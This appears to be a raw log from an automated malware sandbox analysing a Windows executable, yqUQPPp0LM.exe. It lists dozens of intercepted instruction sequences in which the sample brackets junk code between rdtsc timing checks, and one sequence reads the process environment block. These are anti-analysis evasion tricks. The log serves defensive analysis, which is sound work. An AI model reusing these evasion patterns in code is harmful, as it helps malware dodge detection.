Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 11A3C24 second address: 11A3C2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 11A3C2F second address: 11A3C38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 11A3C38 second address: 11A3C48 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jl 00007FE9093D6536h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 11A3C48 second address: 11A3C58 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE908EE710Ch 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 11A7BCE second address: 11A7BEB instructions: 0x00000000 rdtsc 0x00000002 jc 00007FE9093D6536h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FE9093D6543h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 11A7BEB second address: 11A7C13 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007FE908EE7106h 0x00000009 jmp 00007FE908EE7117h 0x0000000e jnc 00007FE908EE7106h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 11A7C13 second address: 11A7C28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FE9093D653Eh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 11A7C28 second address: 11A7C39 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE908EE710Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 11A7C39 second address: 11A7C5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FE9093D6546h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 11A7698 second address: 11A76AD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE908EE710Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 11A7933 second address: 11A7940 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jl 00007FE9093D6546h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 11A7940 second address: 11A7951 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE908EE710Ah 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 11B37F9 second address: 11B37FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 11B33B1 second address: 11B33DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007FE908EE7110h 0x0000000b popad 0x0000000c pushad 0x0000000d jmp 00007FE908EE7110h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 11B6B4F second address: 11B6B55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 11B6B55 second address: 11B6B59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 10E3366 second address: 10E336A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 10E336A second address: 10E337A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007FE908EE711Ah 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 10E337A second address: 10E337E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 10E337E second address: 10E3384 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 11BFAA7 second address: 11BFACE instructions: 0x00000000 rdtsc 0x00000002 jg 00007FE9093D6538h 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FE9093D6545h 0x0000000f jc 00007FE9093D6536h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 11BFACE second address: 11BFB2F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FE908EE710Dh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e pushad 0x0000000f jc 00007FE908EE7106h 0x00000015 pushad 0x00000016 popad 0x00000017 pushad 0x00000018 popad 0x00000019 jmp 00007FE908EE7114h 0x0000001e popad 0x0000001f jmp 00007FE908EE710Bh 0x00000024 jc 00007FE908EE710Ch 0x0000002a jl 00007FE908EE7106h 0x00000030 pushad 0x00000031 jmp 00007FE908EE710Bh 0x00000036 js 00007FE908EE7106h 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 11C7954 second address: 11C7960 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FE9093D6536h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 11C7960 second address: 11C7966 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 11C77EB second address: 11C77F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 11C77F1 second address: 11C77F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 11C77F5 second address: 11C780D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FE9093D653Fh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 11C780D second address: 11C7813 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 11C7813 second address: 11C7819 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 11CB09D second address: 11CB0B5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE908EE7113h 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 11D1EE7 second address: 11D1EFD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE9093D6542h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 11D1EFD second address: 11D1F03 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 11D21CC second address: 11D21D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 11D24A2 second address: 11D24BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE908EE7112h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 11D24BD second address: 11D24C3 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 11D24C3 second address: 11D24CE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jl 00007FE908EE7106h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 11D24CE second address: 11D24E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 js 00007FE9093D6538h 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push edi 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 11D24E2 second address: 11D24E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 11D2780 second address: 11D27A0 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FE9093D6536h 0x00000008 jmp 00007FE9093D6546h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 11D27A0 second address: 11D27AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007FE908EE7106h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 11D27AA second address: 11D27AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 11D27AE second address: 11D27C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a ja 00007FE908EE7108h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 1215674 second address: 1215699 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FE9093D6536h 0x0000000a push eax 0x0000000b pop eax 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f jmp 00007FE9093D6546h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 121A727 second address: 121A750 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FE908EE710Eh 0x00000008 jmp 00007FE908EE710Fh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 121A750 second address: 121A754 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 121A754 second address: 121A760 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 js 00007FE908EE7106h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 121A760 second address: 121A765 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 121BE14 second address: 121BE18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 121BE18 second address: 121BE37 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FE9093D6536h 0x00000008 jmp 00007FE9093D653Bh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jc 00007FE9093D6536h 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 121BE37 second address: 121BE48 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jl 00007FE908EE7108h 0x0000000f push edi 0x00000010 pop edi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 121BE48 second address: 121BE5D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9093D653Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 121BE5D second address: 121BE63 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 1212D25 second address: 1212D2E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 1212D2E second address: 1212D36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 1212D36 second address: 1212D3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 1212D3D second address: 1212D58 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE908EE7117h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 122A575 second address: 122A583 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 jc 00007FE9093D6536h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 122E15C second address: 122E166 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FE908EE7106h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 122E166 second address: 122E17F instructions: 0x00000000 rdtsc 0x00000002 jp 00007FE9093D6536h 0x00000008 jmp 00007FE9093D653Fh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 122DCD4 second address: 122DCE0 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FE908EE7106h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 122DCE0 second address: 122DCF9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FE9093D6544h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 12FB0E5 second address: 12FB0E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 12FB0E9 second address: 12FB10B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007FE9093D653Fh 0x0000000e je 00007FE9093D6536h 0x00000014 push edx 0x00000015 pop edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 12FB254 second address: 12FB25A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 12FD5D1 second address: 12FD5D8 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 12FFE5E second address: 12FFE62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 1300419 second address: 130041E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 130041E second address: 130043A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE908EE7113h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push esi 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 1301D83 second address: 1301D93 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FE9093D6536h 0x00000008 jc 00007FE9093D6536h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 130192C second address: 130193E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007FE908EE710Ch 0x0000000c je 00007FE908EE7106h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 130193E second address: 1301964 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007FE9093D6536h 0x00000009 ja 00007FE9093D6536h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jnc 00007FE9093D6542h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 1303940 second address: 130394B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pop esi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 130394B second address: 1303951 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 7410032 second address: 74100B9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE908EE7119h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FE908EE7113h 0x00000011 or esi, 264F2A2Eh 0x00000017 jmp 00007FE908EE7119h 0x0000001c popfd 0x0000001d popad 0x0000001e xchg eax, ebp 0x0000001f jmp 00007FE908EE710Eh 0x00000024 mov ebp, esp 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 mov ebx, 72C6A3C0h 0x0000002e jmp 00007FE908EE7119h 0x00000033 popad 0x00000034 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 74100B9 second address: 74100BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 74100BF second address: 74100C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 74100C3 second address: 74100C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 74100C7 second address: 7410115 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr fs:[00000030h] 0x0000000e pushad 0x0000000f movsx edi, cx 0x00000012 pushfd 0x00000013 jmp 00007FE908EE710Eh 0x00000018 and ecx, 07BE1C68h 0x0000001e jmp 00007FE908EE710Bh 0x00000023 popfd 0x00000024 popad 0x00000025 sub esp, 18h 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007FE908EE7115h 0x0000002f rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 7410115 second address: 7410144 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9093D6541h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a jmp 00007FE9093D653Eh 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 mov edi, ecx 0x00000015 mov cx, 761Fh 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 7410144 second address: 741014A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 741014A second address: 741014E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 741014E second address: 741015F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov edx, esi 0x0000000e push eax 0x0000000f pop ebx 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 741015F second address: 741017B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE9093D6548h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 741017B second address: 741017F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 741017F second address: 741019D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebx, dword ptr [eax+10h] 0x0000000b pushad 0x0000000c mov ebx, 0D752A00h 0x00000011 movsx edi, ax 0x00000014 popad 0x00000015 xchg eax, esi 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 mov di, 1330h 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 741019D second address: 74101A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 74101A3 second address: 74101F5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9093D6547h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007FE9093D6549h 0x00000011 xchg eax, esi 0x00000012 jmp 00007FE9093D653Eh 0x00000017 mov esi, dword ptr [76EB06ECh] 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 74101F5 second address: 74101F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 74101F9 second address: 74101FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 74101FF second address: 7410205 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 7410205 second address: 741025B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9093D653Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test esi, esi 0x0000000d jmp 00007FE9093D6540h 0x00000012 jne 00007FE9093D73B9h 0x00000018 jmp 00007FE9093D6540h 0x0000001d xchg eax, edi 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FE9093D6547h 0x00000025 rdtsc
